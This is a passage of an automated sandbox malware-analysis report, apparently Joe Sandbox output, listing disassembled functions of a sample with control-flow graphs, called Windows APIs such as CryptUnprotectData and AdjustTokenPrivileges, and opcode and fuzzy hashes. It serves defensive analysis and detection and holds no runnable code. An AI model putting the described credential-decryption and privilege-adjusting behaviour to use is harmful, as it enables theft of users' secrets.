                                                                                                                                                              • Instruction Fuzzy Hash: C5D13C71E0965D8FDBA8DF98D894BEDBBF1FB59300F10416AD04DE32A1DA346A85CB40
                                                                                                                                                              Function 00007FFD9B727A11 Relevance: 1.8, APIs: 1, Instructions: 251encryptionCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1162 7ffd9b727a11-7ffd9b727a55 1164 7ffd9b727a9f-7ffd9b727b36 1162->1164 1165 7ffd9b727a57-7ffd9b727a9a 1162->1165 1168 7ffd9b727b38-7ffd9b727b3c 1164->1168 1169 7ffd9b727ba7-7ffd9b727bbc 1164->1169 1165->1164 1172 7ffd9b727b3e-7ffd9b727b58 1168->1172 1173 7ffd9b727b8b-7ffd9b727ba6 1168->1173 1171 7ffd9b727bc4-7ffd9b727c47 CryptUnprotectData 1169->1171 1174 7ffd9b727c4f-7ffd9b727cc1 1171->1174 1175 7ffd9b727c49 1171->1175 1172->1173 1173->1169 1175->1174
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CryptDataUnprotect
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 834300711-0
                                                                                                                                                              • Opcode ID: 266368fb0b9b755e47246593c5013ad8321f2d63c1c185e61fce6bd6b2a85691
                                                                                                                                                              • Instruction ID: 9c5e47c9c6d3dd21550aff037317a5cf79de3fd02272e435553a51d543ad02a1
                                                                                                                                                              • Opcode Fuzzy Hash: 266368fb0b9b755e47246593c5013ad8321f2d63c1c185e61fce6bd6b2a85691
                                                                                                                                                              • Instruction Fuzzy Hash: 8E816C74E08A5D8FDB98DF58C855BE9B7F1FB59300F0042AAD44DE3251DB70A984CB81
                                                                                                                                                              Function 00007FFD9B72ED75 Relevance: 1.7, APIs: 1, Instructions: 243COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1181 7ffd9b72ed75-7ffd9b72ed81 1182 7ffd9b72ed83-7ffd9b72ed8b 1181->1182 1183 7ffd9b72ed8c-7ffd9b72ed9a 1181->1183 1182->1183 1184 7ffd9b72ed37-7ffd9b72ed73 1183->1184 1185 7ffd9b72ed9c-7ffd9b72eeed AdjustTokenPrivileges 1183->1185 1190 7ffd9b72eeef 1185->1190 1191 7ffd9b72eef5-7ffd9b72ef65 1185->1191 1190->1191
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AdjustPrivilegesToken
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2874748243-0
                                                                                                                                                              • Opcode ID: 3ebc3c6cb5bbde2c983c73942f06ebfa717d9ad18a6e527f956cbd01a826a152
                                                                                                                                                              • Instruction ID: 12dc6f6661177405d13968158184189ff623a5b73b79e4d88653d2801f9645d1
                                                                                                                                                              • Opcode Fuzzy Hash: 3ebc3c6cb5bbde2c983c73942f06ebfa717d9ad18a6e527f956cbd01a826a152
                                                                                                                                                              • Instruction Fuzzy Hash: 86712570A0861C8FDB98DF58D895BE9BBF1FB69310F1041AAD44DE3292DB34A985CF40
                                                                                                                                                              Function 00007FFD9B72B2F5 Relevance: 1.7, APIs: 1, Instructions: 185nativeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1195 7ffd9b72b2f5-7ffd9b72b445 NtQueryInformationToken 1202 7ffd9b72b44d-7ffd9b72b499 1195->1202 1203 7ffd9b72b447 1195->1203 1203->1202
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InformationQueryToken
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4239771691-0
                                                                                                                                                              • Opcode ID: db1adadff58f37e5f140482580480a04063bf0cdb7ef4ec0992473d05c41915a
                                                                                                                                                              • Instruction ID: 85923b51158922d51a7bc2578d7a242c298b2851addfb32e83cb69175f5efd21
                                                                                                                                                              • Opcode Fuzzy Hash: db1adadff58f37e5f140482580480a04063bf0cdb7ef4ec0992473d05c41915a
                                                                                                                                                              • Instruction Fuzzy Hash: 27512470908A4C8FDB98DF58C894BE9BBF1FB69310F1081AED04DE3251DA70A985CB44
                                                                                                                                                              Function 00007FFD9B72E3E9 Relevance: 1.6, APIs: 1, Instructions: 138nativeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1383 7ffd9b72e3e9-7ffd9b72e4d3 NtClose 1387 7ffd9b72e4d5 1383->1387 1388 7ffd9b72e4db-7ffd9b72e519 1383->1388 1387->1388
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: b3b1ab72f5f703515b953508e14451d4eb8da18dc54765237b57bf70a01b86a1
                                                                                                                                                              • Instruction ID: e83fcf01d4f7068ceadd57eba7f42f8319baf119a2d3602fcebd15b5be4682db
                                                                                                                                                              • Opcode Fuzzy Hash: b3b1ab72f5f703515b953508e14451d4eb8da18dc54765237b57bf70a01b86a1
                                                                                                                                                              • Instruction Fuzzy Hash: 63414C70E0864C8FDB59DFA8D894BADBBF0FB5A310F1441AED049E7252DA74A845CB41
                                                                                                                                                              Function 00007FFD9B727B5D Relevance: 1.6, APIs: 1, Instructions: 118encryptionCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1450 7ffd9b727b5d-7ffd9b727c47 CryptUnprotectData 1455 7ffd9b727c4f-7ffd9b727cc1 1450->1455 1456 7ffd9b727c49 1450->1456 1456->1455
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CryptDataUnprotect
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 834300711-0
                                                                                                                                                              • Opcode ID: b777c12cf1688e46964b30c03338228adc026e5925a48ac432888d10ea2f9924
                                                                                                                                                              • Instruction ID: 9be4a4ef7ad59051df3107ea23f4c924ba3d66862f2d7ecf0069c8a2900c3617
                                                                                                                                                              • Opcode Fuzzy Hash: b777c12cf1688e46964b30c03338228adc026e5925a48ac432888d10ea2f9924
                                                                                                                                                              • Instruction Fuzzy Hash: F741C930918A1D8FDB94DF58C894BE9B7B1FB59300F0092E9D40DE3255DB74AA84CF41
                                                                                                                                                              Function 00007FFD9B7414AA Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: U
                                                                                                                                                              • API String ID: 0-3372436214
                                                                                                                                                              • Opcode ID: 7bac35e52e4a72dd915fff0a7cfc6dc2e3df5cc60c7f19b07d2e7450c70423d4
                                                                                                                                                              • Instruction ID: d96ff0059dcf108f0037b2c76aa52c88c3467f615005fa371cc3381878597438
                                                                                                                                                              • Opcode Fuzzy Hash: 7bac35e52e4a72dd915fff0a7cfc6dc2e3df5cc60c7f19b07d2e7450c70423d4
                                                                                                                                                              • Instruction Fuzzy Hash: F3715F30E0965D8FDB55EFA8C464BACBBB2FF59301F5501AAD00DE72A6CE359941CB01
                                                                                                                                                              Function 00007FFD9B723F81 Relevance: .7, Instructions: 712COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2e9558ff75b8dbabc80a263dc7700e8ed41cadf0e4243610029a0682181dcb99
                                                                                                                                                              • Instruction ID: cf88bf2d5da4985271eeee836b3c15294c8761b10eec94dc517c22f2be64063a
                                                                                                                                                              • Opcode Fuzzy Hash: 2e9558ff75b8dbabc80a263dc7700e8ed41cadf0e4243610029a0682181dcb99
                                                                                                                                                              • Instruction Fuzzy Hash: 9E42AF30E0A69D8FD769DF65C4647A87BB0EF56304F4101FED04DEB2A6DA385A84CB10
                                                                                                                                                              Function 00007FFD9B73E14A Relevance: .7, Instructions: 702COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4fade443ed70e7ea4e296834c2377ab8e9fe419959ccfe9c623c2d190dad401e
                                                                                                                                                              • Instruction ID: 1e04e0cc98313d02f17192b40f04cbbcf2a480ae071db936fe6f96ef3e7360f4
                                                                                                                                                              • Opcode Fuzzy Hash: 4fade443ed70e7ea4e296834c2377ab8e9fe419959ccfe9c623c2d190dad401e
                                                                                                                                                              • Instruction Fuzzy Hash: 76325F70A19A8D8FEBB8DF18C865BE937E1FF59301F10426AD84EC72A1DB745681CB41
                                                                                                                                                              Function 00007FFD9B73F9A2 Relevance: .7, Instructions: 669COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b0e00b946c19b4a0f650f2d1683d27896ce0c18bbc8cd3817af5314cda2263d4
                                                                                                                                                              • Instruction ID: 05a062ed5b7e3c90e86423b3cc0cd85612b6518aa5e59ecaeba7fb8f28666524
                                                                                                                                                              • Opcode Fuzzy Hash: b0e00b946c19b4a0f650f2d1683d27896ce0c18bbc8cd3817af5314cda2263d4
                                                                                                                                                              • Instruction Fuzzy Hash: 29325F70A19A8D8FDBB8DF28C8657E937E1FF59311F10422AD84DCB2A1DB745680CB41
                                                                                                                                                              Function 00007FFD9B735D53 Relevance: .2, Instructions: 225COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f6d6f563306bf2c8de4e157e43f67e55b26e1181b03e32a422e7e41000566277
                                                                                                                                                              • Instruction ID: a2b4a79b4d58dcf6ee37bcf96f99030d836f86ee6b0906fb7575ff84c7b03627
                                                                                                                                                              • Opcode Fuzzy Hash: f6d6f563306bf2c8de4e157e43f67e55b26e1181b03e32a422e7e41000566277
                                                                                                                                                              • Instruction Fuzzy Hash: 8F811E30E0961D8FDB99DF68C4A4AACB7B1FF59304F6441AED01DE72A6CA356981CB01
                                                                                                                                                              Function 00007FFD9B72229A Relevance: .2, Instructions: 215COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e83cc4f1ccc4fa7700e169fb719522b8e86f9a9f6b8e49e2cf6e5b42eaeb175f
                                                                                                                                                              • Instruction ID: 0620b03805a7f57e089285972e012a5a37dec2ad64939f8d65303a1a8da9ee93
                                                                                                                                                              • Opcode Fuzzy Hash: e83cc4f1ccc4fa7700e169fb719522b8e86f9a9f6b8e49e2cf6e5b42eaeb175f
                                                                                                                                                              • Instruction Fuzzy Hash: 1F61A330E09B4E8FDB55DF68C4606A9B7F1FF99300F5541BAD409D72A6CA35E942C780
                                                                                                                                                              Function 00007FFD9B7300EA Relevance: .1, Instructions: 73COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: bdcbcf09a91d786d6a12025860a600e5972a90559e70a26dca6fe9894b796dfb
                                                                                                                                                              • Instruction ID: ce08eace28970d02b7fd6fa2b00dfbf4002107527c8ae546ab0bf0799df305e9
                                                                                                                                                              • Opcode Fuzzy Hash: bdcbcf09a91d786d6a12025860a600e5972a90559e70a26dca6fe9894b796dfb
                                                                                                                                                              • Instruction Fuzzy Hash: 0021B770A19A1D8FDBA4EB58C855AB9B3F5FF55300F5142E9D14DE3261CE34AA80CF40
                                                                                                                                                              Function 00007FFD9B730D7E Relevance: .0, Instructions: 36COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: bd6771e03500608e38f0c52b7bada118b3764c3d1980c421dfa89c4d5b8239f5
                                                                                                                                                              • Instruction ID: dac6c49503d03fd3ddf2dd7a3c80eae07ff62658063daa2ebc02d8510946d6e5
                                                                                                                                                              • Opcode Fuzzy Hash: bd6771e03500608e38f0c52b7bada118b3764c3d1980c421dfa89c4d5b8239f5
                                                                                                                                                              • Instruction Fuzzy Hash: 28F0F970E1961CCECBA4DB9894506ECB3B0FF59304F1006A9C10DE3661CF359A808B44
                                                                                                                                                              Function 00007FFD9B731269 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 923a44ee5c7f590134229cb8d81dac0a028129fd6b32b392bca7171ff6ede5b4
                                                                                                                                                              • Instruction ID: 18bf86b67b0fe6ea00b224f7ec1d22703e08fb6f1c7da8d95b9f7b8f84470f92
                                                                                                                                                              • Opcode Fuzzy Hash: 923a44ee5c7f590134229cb8d81dac0a028129fd6b32b392bca7171ff6ede5b4
                                                                                                                                                              • Instruction Fuzzy Hash: F4F0F470E0A61CCEDBA4DB989450AECB3B0FF59304F0006A9C10EE32A1CB31AA808F44
                                                                                                                                                              Function 00007FFD9B73162D Relevance: .0, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6df665093532ea47b04e8ce05fcf166874b7f9426310c7e458a53a6f2ac3aa5e
                                                                                                                                                              • Instruction ID: 43a9ff4859eba62a5ccc3998380e98eca22e25b51b06dd23f61d527c6b17c85d
                                                                                                                                                              • Opcode Fuzzy Hash: 6df665093532ea47b04e8ce05fcf166874b7f9426310c7e458a53a6f2ac3aa5e
                                                                                                                                                              • Instruction Fuzzy Hash: DDF0A470E0961CCEDBA4DA58D454AECB3B1FB55305F0016A9C10DE3661CB359A808B44
                                                                                                                                                              Function 00007FFD9B722378 Relevance: 1.9, APIs: 1, Instructions: 361libraryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1040 7ffd9b722378-7ffd9b7260ae 1042 7ffd9b7260b4-7ffd9b7260b9 1040->1042 1043 7ffd9b7261dc-7ffd9b7261e6 1040->1043 1044 7ffd9b7260bf-7ffd9b7260d7 1042->1044 1045 7ffd9b7261ab-7ffd9b7261b6 1042->1045 1050 7ffd9b7261e7-7ffd9b72621a 1043->1050 1047 7ffd9b7260d9-7ffd9b7260e4 1044->1047 1048 7ffd9b7260eb-7ffd9b726103 1044->1048 1049 7ffd9b7261b7-7ffd9b7261c0 1045->1049 1052 7ffd9b726104-7ffd9b72610f 1047->1052 1053 7ffd9b7260e6-7ffd9b7260e9 1047->1053 1048->1052 1050->1049 1058 7ffd9b72621c-7ffd9b7262a0 1050->1058 1052->1050 1055 7ffd9b726115-7ffd9b726120 1052->1055 1053->1048 1055->1045 1057 7ffd9b726126-7ffd9b72612e 1055->1057 1057->1050 1059 7ffd9b726134-7ffd9b726140 1057->1059 1071 7ffd9b7262a2-7ffd9b7262b9 1058->1071 1072 7ffd9b7262bc-7ffd9b72631a LoadLibraryExW 1058->1072 1061 7ffd9b726142-7ffd9b72614e 1059->1061 1062 7ffd9b726193-7ffd9b72619b 1059->1062 1061->1050 1063 7ffd9b726154-7ffd9b726168 1061->1063 1062->1050 1065 7ffd9b72619d-7ffd9b7261a5 1062->1065 1066 7ffd9b7261c1-7ffd9b7261c6 1063->1066 1067 7ffd9b72616a-7ffd9b72617d 1063->1067 1065->1045 1065->1057 1068 7ffd9b726181-7ffd9b726191 1066->1068 1067->1068 1068->1062 1076 7ffd9b7261c8-7ffd9b7261db 1068->1076 1071->1072 1074 7ffd9b726322-7ffd9b726374 1072->1074 1075 7ffd9b72631c 1072->1075 1075->1074
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              • Opcode ID: a4431144cd33bd05409433258662d64b620be83a2db641e4d6199d9764a2d917
                                                                                                                                                              • Instruction ID: 034e1d17a8a767f355c80abedd7ef9a3c171b6d5188607a2f364d537f9a42ee2
                                                                                                                                                              • Opcode Fuzzy Hash: a4431144cd33bd05409433258662d64b620be83a2db641e4d6199d9764a2d917
                                                                                                                                                              • Instruction Fuzzy Hash: FAB19170A09B0D8FEB68DB98D895AB9B7E1FF59310F14426ED04DD3262DA35E942CB40

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 00007FFD9B73D9CD Relevance: .6, Instructions: 612COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b3730b4b15ef23f6ef98cf77a7b6079fe214cef39828c10a25556a85ae9e3ddb
                                                                                                                                                              • Instruction ID: 41b55eb76678623da3495a2041408639689a0104e7a4d9a0203e833146622604
                                                                                                                                                              • Opcode Fuzzy Hash: b3730b4b15ef23f6ef98cf77a7b6079fe214cef39828c10a25556a85ae9e3ddb
                                                                                                                                                              • Instruction Fuzzy Hash: 5F224D70A18A8D8FDBB9EF28C855BE937E1FF59301F10426AD85DC72A1DB746680CB41
                                                                                                                                                              Function 00007FFD9B727275 Relevance: .6, Instructions: 596COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 664713fa8329b3dba23f60463932e5d3d1f821bb0bfd8d36a8b2d7a53e003433
                                                                                                                                                              • Instruction ID: ea9986899f89c78834d62638b43915beeddb61d319b13a54c2047d1369a4e610
                                                                                                                                                              • Opcode Fuzzy Hash: 664713fa8329b3dba23f60463932e5d3d1f821bb0bfd8d36a8b2d7a53e003433
                                                                                                                                                              • Instruction Fuzzy Hash: E3127F30A19A8D8FDB69DF68C895BE977E0FF55310F10427ED84EC72A2DA34A941CB41
                                                                                                                                                              Function 00007FFD9B737D21 Relevance: .5, Instructions: 458COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 401feb909ba1f4b221f27ea20b5db5bb547383a5c7c974bffd004fdef94b5580
                                                                                                                                                              • Instruction ID: e6c1c2da4db0703ff53f189a6dffe20c2ad7bec732e0bba1e7ad66bc4b015543
                                                                                                                                                              • Opcode Fuzzy Hash: 401feb909ba1f4b221f27ea20b5db5bb547383a5c7c974bffd004fdef94b5580
                                                                                                                                                              • Instruction Fuzzy Hash: 5002FA70E0961D8FDB99DF68C894BA8B7B1FF59304F5041EAD00DE72A5DA35AA81CF01
                                                                                                                                                              Function 00007FFD9B726A89 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7d8769221060458f39e60322021742c1d732c0d28b711f8262035dd36e8deb9b
                                                                                                                                                              • Instruction ID: 958b0c631226a7872a16487729b30134ec6e0bf2c3c7750b19743f6c402ff5e4
                                                                                                                                                              • Opcode Fuzzy Hash: 7d8769221060458f39e60322021742c1d732c0d28b711f8262035dd36e8deb9b
                                                                                                                                                              • Instruction Fuzzy Hash: 62819370A08A8D8FDBA8EF58C855BE977E1FF59310F10416AE84DC7291DB74E984CB81
                                                                                                                                                              Function 00007FFD9B7249DB Relevance: .2, Instructions: 236COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5132b6c6865e2720c98e28e2e5a204d552ebcf0fdc3c5590e3ffdc66e2a7b164
                                                                                                                                                              • Instruction ID: 0d32213a31e39dfb0476ece24ab193b8120d5254750abdacb0a2a49ac253ea3d
                                                                                                                                                              • Opcode Fuzzy Hash: 5132b6c6865e2720c98e28e2e5a204d552ebcf0fdc3c5590e3ffdc66e2a7b164
                                                                                                                                                              • Instruction Fuzzy Hash: 70717570A08A8D8FDBA8EF58C855BE977E1FB59310F10412AE80DC7291DB74E984CB41
                                                                                                                                                              Function 00007FFD9B7372C5 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 87a7dbeee7adf1ddb3ebcf8eaa91aee636632f364ad275da5c14b17c3cd525cb
                                                                                                                                                              • Instruction ID: b0396688f45e0f297cede43c85a8789232ce025f0e6bf8e248164f316dd40021
